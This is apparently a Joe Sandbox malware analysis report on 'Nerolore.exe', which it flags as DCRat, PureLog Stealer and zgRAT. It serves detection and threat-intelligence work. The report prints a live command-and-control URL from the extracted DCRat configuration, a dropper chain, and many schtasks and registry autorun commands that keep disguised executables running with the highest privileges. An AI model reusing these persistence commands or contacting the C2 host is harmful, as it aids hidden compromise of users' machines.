Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Nerolore.exe

Overview

General Information

Sample name:Nerolore.exe
Analysis ID:1498674
MD5:173524b924df7f85fc534a492707f643
SHA1:44362f40b387610d723ba6090ffacf5a17f98bd3
SHA256:9559e225f13920d3f18a77d324a732447c67b85073af3044237d51eefdbec0a2
Tags:exe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
AI detected suspicious sample
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Creates processes via WMI
Hides threads from debuggers
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: System File Execution Location Anomaly
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to harvest and steal browser information (history, passwords, etc)
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • Nerolore.exe (PID: 2640 cmdline: "C:\Users\user\Desktop\Nerolore.exe" MD5: 173524B924DF7F85FC534A492707F643)
    • wscript.exe (PID: 6512 cmdline: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 4408 cmdline: C:\Windows\system32\cmd.exe /c ""C:\FontHost\jaBrEDg4l5LU3rdwo0YF4dXFHSglnc1NMMTuA.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 3624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ContainerAgentWinSession.exe (PID: 5344 cmdline: "C:\FontHost/ContainerAgentWinSession.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
          • schtasks.exe (PID: 6976 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 9 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1772 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6056 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 6 /tr "'C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • csc.exe (PID: 6752 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 5168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 1164 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9C21.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC8B039BDD94094F1C8481C1D931E1DDC9.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • csc.exe (PID: 3772 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\00lep0eq\00lep0eq.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
            • conhost.exe (PID: 5664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • cvtres.exe (PID: 6968 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9E35.tmp" "c:\Windows\System32\CSCBE36F6BF318F4E92A088C79F57D3D17B.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
          • schtasks.exe (PID: 2636 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 11 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6132 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2020 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 10 /tr "'C:\FontHost\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6304 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2408 cmdline: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3924 cmdline: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 13 /tr "'C:\Users\All Users\dbg\conhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5952 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4072 cmdline: schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6208 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 14 /tr "'C:\Users\Default\Templates\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1524 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1276 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBeg" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6488 cmdline: schtasks.exe /create /tn "NjWYKcLujkVoPzemFBegN" /sc MINUTE /mo 7 /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2636 cmdline: schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 5 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 2108 cmdline: schtasks.exe /create /tn "ContainerAgentWinSession" /sc ONLOGON /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 3836 cmdline: schtasks.exe /create /tn "ContainerAgentWinSessionC" /sc MINUTE /mo 9 /tr "'C:\FontHost\ContainerAgentWinSession.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • cmd.exe (PID: 3652 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 828 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 2636 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • conhost.exe (PID: 7260 cmdline: "C:\Users\All Users\dbg\conhost.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • conhost.exe (PID: 5424 cmdline: "C:\Users\All Users\dbg\conhost.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • conhost.exe (PID: 5632 cmdline: "C:\Users\All Users\dbg\conhost.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • NjWYKcLujkVoPzemFBeg.exe (PID: 6968 cmdline: C:\FontHost\NjWYKcLujkVoPzemFBeg.exe MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • NjWYKcLujkVoPzemFBeg.exe (PID: 5664 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • NjWYKcLujkVoPzemFBeg.exe (PID: 7380 cmdline: "C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exe" MD5: 03EF05FF3B0C058220324C2CE72950F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-2HbjMANWKVWdushT6pWo", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Nerolore.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    Nerolore.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\ProgramData\dbg\conhost.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\ProgramData\dbg\conhost.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\FontHost\NjWYKcLujkVoPzemFBeg.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                Click to see the 7 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                0000001D.00000002.3350660394.00000000027D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000005.00000000.2222651523.0000000000A42000.00000002.00000001.01000000.0000000A.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      0000001D.00000002.3350660394.0000000002AF7000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        Process Memory Space: ContainerAgentWinSession.exe PID: 5344JoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 2 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          5.0.ContainerAgentWinSession.exe.a40000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            5.0.ContainerAgentWinSession.exe.a40000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetFilename: C:\Users\All Users\dbg\conhost.exe
                              Sigma detected: New RUN Key Pointing to Suspicious Folder
                              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: "C:\Users\Default\Templates\OfficeClickToRun.exe", EventID: 13, EventType: SetValue, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OfficeClickToRun
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\All Users\dbg\conhost.exe", CommandLine: "C:\Users\All Users\dbg\conhost.exe", CommandLine|base64offset|contains: , Image: C:\ProgramData\dbg\conhost.exe, NewProcessName: C:\ProgramData\dbg\conhost.exe, OriginalFileName: C:\ProgramData\dbg\conhost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: "C:\Users\All Users\dbg\conhost.exe", ProcessId: 5424, ProcessName: conhost.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe", EventID: 13, EventType: SetValue, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\NjWYKcLujkVoPzemFBeg
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exe", EventID: 13, EventType: SetValue, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\FontHost/ContainerAgentWinSession.exe", ParentImage: C:\FontHost\ContainerAgentWinSession.exe, ParentProcessId: 5344, ParentProcessName: ContainerAgentWinSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", ProcessId: 6752, ProcessName: csc.exe
                              Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                              Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\Nerolore.exe", ParentImage: C:\Users\user\Desktop\Nerolore.exe, ParentProcessId: 2640, ParentProcessName: Nerolore.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbe" , ProcessId: 6512, ProcessName: wscript.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\FontHost\ContainerAgentWinSession.exe, ProcessId: 5344, TargetFilename: C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\FontHost/ContainerAgentWinSession.exe", ParentImage: C:\FontHost\ContainerAgentWinSession.exe, ParentProcessId: 5344, ParentProcessName: ContainerAgentWinSession.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0mqt1et2\0mqt1et2.cmdline", ProcessId: 6752, ProcessName: csc.exe

                              Persistence and Installation Behavior

                              barindex
                              Sigma detected: Schedule system process
                              Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f, CommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\FontHost/ContainerAgentWinSession.exe", ParentImage: C:\FontHost\ContainerAgentWinSession.exe, ParentProcessId: 5344, ParentProcessName: ContainerAgentWinSession.exe, ProcessCommandLine: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\dbg\conhost.exe'" /f, ProcessId: 6304, ProcessName: schtasks.exe

                              Suricata Signatures

                              Timestamp:2024-08-25T15:43:29.322612+0200
                              SID:2048095
                              Severity:1
                              Source Port:49712
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: Nerolore.exeAvira: detected
                              Antivirus detection for URL or domain
                              Source: http://373292cm.nyashka.topAvira URL Cloud: Label: malware
                              Source: http://373292cm.nyashka.top/Avira URL Cloud: Label: malware
                              Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phpAvira URL Cloud: Label: malware
                              Antivirus detection for dropped file
                              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\FontHost\g5hurAAWnnmPcvivkFQfeK8OCkdYaf1Ra.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                              Source: C:\Users\user\Desktop\XwBnJZqg.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\GeIICmFp.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\ProgramData\dbg\conhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\ONhXawky.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\xvosSKAI.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\aQ1wx53V7n.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\FontHost\ContainerAgentWinSession.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Found malware configuration
                              Source: 00000005.00000002.2282828928.0000000013347000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-2HbjMANWKVWdushT6pWo", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for domain / URL
                              Source: 373292cm.nyashka.topVirustotal: Detection: 18%Perma Link
                              Source: http://373292cm.nyashka.top/Virustotal: Detection: 18%Perma Link
                              Source: http://373292cm.nyashka.topVirustotal: Detection: 18%Perma Link
                              Source: http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary.phpVirustotal: Detection: 17%Perma Link
                              Multi AV Scanner detection for dropped file
                              Source: C:\FontHost\ContainerAgentWinSession.exeReversingLabs: Detection: 65%
                              Source: C:\FontHost\ContainerAgentWinSession.exeVirustotal: Detection: 54%Perma Link
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeReversingLabs: Detection: 65%
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeVirustotal: Detection: 54%Perma Link
                              Source: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files\7-Zip\Lang\NjWYKcLujkVoPzemFBeg.exeVirustotal: Detection: 54%Perma Link
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeReversingLabs: Detection: 65%
                              Source: C:\Program Files\Windows Security\BrowserCore\en-US\NjWYKcLujkVoPzemFBeg.exeVirustotal: Detection: 54%Perma Link
                              Source: C:\ProgramData\dbg\conhost.exeReversingLabs: Detection: 65%
                              Source: C:\ProgramData\dbg\conhost.exeVirustotal: Detection: 54%Perma Link
                              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exeReversingLabs: Detection: 65%
                              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exeVirustotal: Detection: 54%Perma Link
                              Source: C:\Users\user\Desktop\EeOHqUfQ.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\EeOHqUfQ.logVirustotal: Detection: 27%Perma Link
                              Source: C:\Users\user\Desktop\EmyZUDGW.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\EmyZUDGW.logVirustotal: Detection: 28%Perma Link
                              Source: C:\Users\user\Desktop\GeIICmFp.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\GeIICmFp.logVirustotal: Detection: 69%Perma Link
                              Source: C:\Users\user\Desktop\LtUgLbtj.logReversingLabs: Detection: 25%
                              Source: C:\Users\user\Desktop\LtUgLbtj.logVirustotal: Detection: 28%Perma Link
                              Source: C:\Users\user\Desktop\ONhXawky.logVirustotal: Detection: 21%Perma Link
                              Source: C:\Users\user\Desktop\XwBnJZqg.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\XwBnJZqg.logVirustotal: Detection: 69%Perma Link
                              Source: C:\Users\user\Desktop\ddCMyFqs.logVirustotal: Detection: 10%Perma Link
                              Source: C:\Users\user\Desktop\goYNyXVt.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\goYNyXVt.logVirustotal: Detection: 27%Perma Link
                              Source: C:\Users\user\Desktop\vBGRGbPj.logVirustotal: Detection: 10%Perma Link
                              Multi AV Scanner detection for submitted file
                              Source: Nerolore.exeReversingLabs: Detection: 78%
                              Source: Nerolore.exeVirustotal: Detection: 66%Perma Link
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\OfficeClickToRun.exeJoe Sandbox ML: detected
                              Source: C:\Windows\System32\SecurityHealthSystray.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\XwBnJZqg.logJoe Sandbox ML: detected
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\GeIICmFp.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeJoe Sandbox ML: detected
                              Source: C:\ProgramData\dbg\conhost.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\vBGRGbPj.logJoe Sandbox ML: detected
                              Source: C:\FontHost\NjWYKcLujkVoPzemFBeg.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\ddCMyFqs.logJoe Sandbox ML: detected
                              Source: C:\FontHost\ContainerAgentWinSession.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: Nerolore.exeJoe Sandbox ML: detected
